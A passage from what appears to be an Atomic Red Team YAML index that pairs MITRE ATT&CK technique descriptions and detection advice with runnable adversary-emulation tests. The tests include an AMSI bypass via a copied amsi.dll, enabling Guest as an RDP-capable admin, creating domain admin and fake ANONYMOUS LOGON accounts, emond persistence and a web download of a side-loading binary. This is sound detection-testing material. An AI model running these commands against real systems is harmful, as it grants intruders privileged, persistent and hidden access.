Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) - - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. - name: DLL Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.001 - url: https://attack.mitre.org/techniques/T1574/001 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - source_name: Microsoft Dynamic Link Library Search Order - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. - Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting - description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, - 2016. 
- source_name: OWASP Binary Planting - - source_name: Microsoft Security Advisory 2269637 - url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 - description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved - March 13, 2020. - - source_name: Microsoft Dynamic-Link Library Redirection - url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN - description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. - Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 - description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests - - source_name: FireEye DLL Search Order Hijacking - url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html - description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking - Revisited. Retrieved March 13, 2020. - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring - x_mitre_detection: Monitor file systems for moving, renaming, replacing, or - modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared - with past behavior) that do not correlate with known software, patches, etc., - are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. 
- x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1574.001 - atomic_tests: - - name: DLL Search Order Hijacking - amsi.dll - auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - description: | - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - - Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - supported_platforms: - - windows - executor: - command: | - copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe - copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll - %APPDATA%\updater.exe -Command exit - cleanup_command: | - del %APPDATA%\updater.exe >nul 2>&1 - del %APPDATA%\amsi.dll >nul 2>&1 - name: command_prompt - elevation_required: true - T1574.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.002 - url: https://attack.mitre.org/techniques/T1574/002 - - external_id: CAPEC-641 - source_name: capec - url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - - source_name: FireEye DLL Side-Loading - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf - description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in - the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: DLL Side-Loading - description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. - - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. - id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). 
Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. - x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network - x_mitre_platforms: - - Windows - identifier: T1574.002 - atomic_tests: - - name: DLL Side-Loading using the Notepad++ GUP.exe binary - auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - description: | - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. - Upon execution, calc.exe will be opened. - supported_platforms: - - windows - input_arguments: - process_name: - description: Name of the created process - type: string - default: calculator.exe - gup_executable: - description: GUP is an open source signed binary used by Notepad++ for software - updates - type: path - default: PathToAtomicsFolder\T1574.002\bin\GUP.exe - dependency_executor_name: powershell - dependencies: - - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - -' - prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" - executor: - command: "#{gup_executable}\n" - cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - -' - name: command_prompt - T1078.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.001 - url: https://attack.mitre.org/techniques/T1078/001 - - external_id: CAPEC-70 - source_name: capec - url: https://capec.mitre.org/data/definitions/70.html - - source_name: Microsoft Local Accounts Feb 2019 - url: 
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - description: Microsoft. (2018, December 9). Local Accounts. Retrieved February - 11, 2019. - - source_name: Metasploit SSH Module - url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Default Accounts - description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) - - Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. 
Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) - id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' - created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Monitor whether default accounts have been activated or logged - into. These audits should also include checks on any appliances and applications - for default credentials or SSH keys, and if any are discovered, they should - be updated immediately. - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS - identifier: T1078.001 - atomic_tests: - - name: Enable Guest account with RDP capability and admin priviliges - auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections - supported_platforms: - - windows - input_arguments: - guest_user: - description: Specify the guest account - type: String - default: guest - guest_password: - description: Specify the guest password - type: String - default: Password123! 
- executor: - command: |- - net user #{guest_user} /active:yes - net user #{guest_user} #{guest_password} - net localgroup administrators #{guest_user} /add - net localgroup "Remote Desktop Users" #{guest_user} /add - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f - cleanup_command: |- - net user #{guest_user} /active:no >nul 2>&1 - net localgroup administrators #{guest_user} /delete >nul 2>&1 - net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1136.002: - technique: - created: '2020-01-28T14:05:17.825Z' - modified: '2020-03-23T18:12:36.696Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177 - description: |- - Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. - - Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. 
- name: Domain Account - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1136.002 - url: https://attack.mitre.org/techniques/T1136/002 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_detection: 'Monitor for processes and command-line parameters associated - with domain account creation, such as net user /add /domain. - Collect data on account creation within a network. Event ID 4720 is generated - when a user account is created on a Windows domain controller. (Citation: - Microsoft User Creation Event) Perform regular audits of domain accounts to - detect suspicious accounts that may have been created by an adversary.' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1136.002 - atomic_tests: - - name: Create a new Windows domain admin user - auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 - description: 'Creates a new domain admin user in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.002_Admin - password: - description: Password of the user to create - type: String - default: T1136_pass123! 
- group: - description: Domain administrator group to which add the user to - type: String - default: Domain Admins - executor: - command: | - net user "#{username}" "#{password}" /add /domain - net group "#{group}" "#{username}" /add /domain - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: command_prompt - elevation_required: false - - name: Create a new account similar to ANONYMOUS LOGON - auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 - description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: ANONYMOUS LOGON - password: - description: Password of the user to create - type: String - default: T1136_pass123! - executor: - command: 'net user "#{username}" "#{password}" /add /domain - -' - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: command_prompt - elevation_required: false - - name: Create a new Domain Account using PowerShell - auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 - description: 'Creates a new Domain User using the credentials of the Current - User - -' - supported_platforms: - - windows - input_arguments: - username: - description: Name of the Account to be created - type: String - default: T1136.002_Admin - password: - description: Password of the Account to be created - type: String - default: T1136_pass123! 
- executor: - command: | - $SamAccountName = '#{username}' - $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force - Add-Type -AssemblyName System.DirectoryServices.AccountManagement - $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) - $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) - $User.SamAccountName = $SamAccountName - $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) - $User.SetPassword($TempCred.GetNetworkCredential().Password) - $User.Enabled = $True - $User.PasswordNotRequired = $False - $User.DisplayName = $SamAccountName - $User.Save() - $User - cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - -' - name: powershell - elevation_required: false - T1078.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.002 - url: https://attack.mitre.org/techniques/T1078/002 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - source_name: Microsoft AD Accounts - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts - description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved - March 13, 2020. - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. 
- source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Accounts - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:42:11.787Z' - created: '2020-03-13T20:21:54.758Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_data_sources: - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.004: - technique: - id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 - description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. - - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. 
- name: Dylib Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.004 - url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' - created: '2020-03-16T15:23:30.896Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. 
' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control - atomic_tests: [] - T1546.014: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.014 - url: https://attack.mitre.org/techniques/T1546/014 - - source_name: xorrior emond Jan 2018 - url: https://www.xorrior.com/emond-persistence/ - description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For - Persistence. Retrieved September 10, 2019. - - source_name: magnusviri emond Apr 2016 - url: http://www.magnusviri.com/Mac/what-is-emond.html - description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September - 10, 2019. - - source_name: sentinelone macos persist Jun 2019 - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. - Retrieved September 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Emond - description: |- - Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. - - The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. 
The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) - - Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. - id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:37:25.307Z' - created: '2020-01-24T15:15:13.426Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Monitor emond rules creation by checking for files created - or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. 
- x_mitre_data_sources: - - File monitoring - x_mitre_contributors: - - Ivan Sinyakov - x_mitre_platforms: - - macOS - identifier: T1546.014 - atomic_tests: - - name: Persistance with Event Monitor - emond - auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) - daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - -' - supported_platforms: - - macos - input_arguments: - plist: - description: Path to attacker emond plist file - type: path - default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist - executor: - command: | - sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist - sudo touch /private/var/db/emondClients/T1546.014 - cleanup_command: | - sudo rm /etc/emond.d/rules/T1546.014_emond.plist - sudo rm /private/var/db/emondClients/T1546.014 - name: sh - elevation_required: true - T1546: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546 - url: https://attack.mitre.org/techniques/T1546 - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. 
- source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Event Triggered Execution - description: "Adversaries may establish persistence and/or elevate privileges - using system mechanisms that trigger execution based on specific events. Various - operating systems have means to monitor and subscribe to events such as logons - or other user activity such as running specific applications/binaries. \n\nAdversaries - may abuse these mechanisms as a means of maintaining persistent access to - a victim via repeatedly executing malicious code. After gaining access to - a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked.(Citation: - FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia - malware)\n\nSince the execution can be proxied by an account with higher permissions, - such as SYSTEM or service accounts, an adversary may be able to abuse these - triggered execution mechanisms to escalate their privileges. " - id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-21T18:48:27.576Z' - created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitoring for additions or modifications of mechanisms - that could be used to trigger event-based execution, especially the addition - of abnormal commands such as execution of unknown programs, opening network - sockets, or reaching out across the network. Also look for changes that do - not line up with updates, patches, or other planned administrative activity. 
- \n\nThese mechanisms may vary by OS, but are typically stored in central repositories - that store configuration information such as the Windows Registry, Common - Information Model (CIM), and/or specific named files, the last of which can - be hashed and compared to known good values. \n\nMonitor for processes, API/System - calls, and other common ways of manipulating these event repositories. \n\nTools - such as Sysinternals Autoruns can be used to detect changes to execution triggers - that could be attempts at persistence. Also look for abnormal process call - trees for execution of other commands that could relate to Discovery actions - or other techniques. \n\nMonitor DLL loads by processes, specifically looking - for DLLs that are not recognized or not normally loaded into a process. Look - for abnormal process behavior that may be due to a process loading a malicious - DLL. Data and events should not be viewed in isolation, but as part of a chain - of behavior that could lead to other activities, such as making network connections - for Command and Control, learning details about the environment through Discovery, - and conducting Lateral Movement. " - x_mitre_data_sources: - - API monitoring - - Windows event logs - - System calls - - Binary file metadata - - Process use of network - - WMI Objects - - File monitoring - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1098.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.002 - url: https://attack.mitre.org/techniques/T1098/002 - - source_name: Microsoft - Add-MailboxPermission - url: https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps - description: Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September - 13, 2019. 
- - url: https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - description: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. - source_name: FireEye APT35 2018 - - source_name: Crowdstrike Hiding in Plain Sight 2018 - url: https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ - description: 'Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the - Office 365 Activities API to Investigate Business Email Compromises. Retrieved - January 19, 2020.' - - source_name: Bienstock, D. - Defending O365 - 2019 - url: https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 - description: 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending - O365. Retrieved September 13, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Exchange Email Delegate Permissions - description: |- - Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) - - This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. 
For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) - id: attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:18:36.254Z' - created: '2020-01-19T16:54:28.516Z' - x_mitre_contributors: - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. - - A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring. - x_mitre_data_sources: - - Office 365 audit logs - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1574.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.005 - url: https://attack.mitre.org/techniques/T1574/005 - - source_name: mozilla_sec_adv_2012 - url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - description: Robert Kugler. (2012, November 20). Mozilla Foundation Security - Advisory 2012-98. Retrieved March 10, 2017. - - source_name: Executable Installers are Vulnerable - url: https://seclists.org/fulldisclosure/2015/Dec/34 - description: 'Stefan Kanthak. (2015, December 